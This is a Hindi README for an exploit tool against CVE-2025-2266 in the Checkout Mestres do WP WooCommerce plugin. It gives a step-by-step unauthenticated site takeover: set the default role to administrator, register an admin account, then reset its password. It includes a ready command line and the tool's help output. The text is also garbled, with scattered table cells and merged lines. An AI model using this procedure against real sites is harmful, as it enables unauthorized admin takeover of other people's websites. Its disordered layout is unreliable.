
WooCommerce के लिए Checkout Mestres do WP 8.6.5 - 8.7.5 - बिना प्रमाणीकरण के मनमाना विकल्प अद्यतन
वर्डप्रेस के लिए Checkout Mestres do WP for WooCommerce प्लगइन, संस्करण 8.6.5 से 8.7.5 तक, बिना प्रमाणीकरण के मनमाने विकल्प अद्यतन भेद्यता से प्रभावित है।
कमजोर फ़ंक्शन cwmpUpdateOptions() में उचित क्षमता जाँच का अभाव है, जिससे बिना प्रमाणीकरण वाले हमलावर किसी भी WordPress विकल्प को अद्यतन कर सकते हैं।
एक हमलावर निम्न कार्य कर सकता है:
administrator पर सेट करनाCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hयह Python स्क्रिप्ट निम्न के लिए भेद्यता का शोषण करती है:
administrator को डिफ़ॉल्ट भूमिका के रूप में निर्दिष्ट करनाrequests मॉड्यूल (pip install requests के माध्यम से स्थापित करें)8.6.5 – 8.7.5) के साथ WordPress साइटस्क्रिप्ट निम्न के माध्यम से प्लगइन संस्करण की जाँच करती है:
/wp-content/plugins/checkout-mestres-wp/readme.txt
यदि प्लगइन कमजोर है:
व्यवस्थापक विशेषाधिकारों के साथ एक नया उपयोगकर्ता (डिफ़ॉल्ट: nxploited) पंजीकृत करती है
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| विकल्प | विवरण |
|---|---|
-u, --url |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
एक बार उपयोगकर्ता बन जाने पर:
लॉगिन पृष्ठ पर जाएँ:
http://target.com/wordpress/wp-login.php
"Lost your password?" पर क्लिक करें
[email protected])एक पासवर्ड सेट करें और पूर्ण व्यवस्थापक पहुँच प्राप्त करें 🎯
Nxploited | Khaled Alenazi द्वारा शोषण
⚠️ यह स्क्रिप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
| लक्ष्य WordPress साइट URL (आवश्यक) |
-newuser | नया व्यवस्थापक उपयोगकर्ता बनाएँ (डिफ़ॉल्ट उपयोगकर्ता नाम: nxploited) |
-email | नए उपयोगकर्ता के लिए ईमेल (डिफ़ॉल्ट: [email protected]) |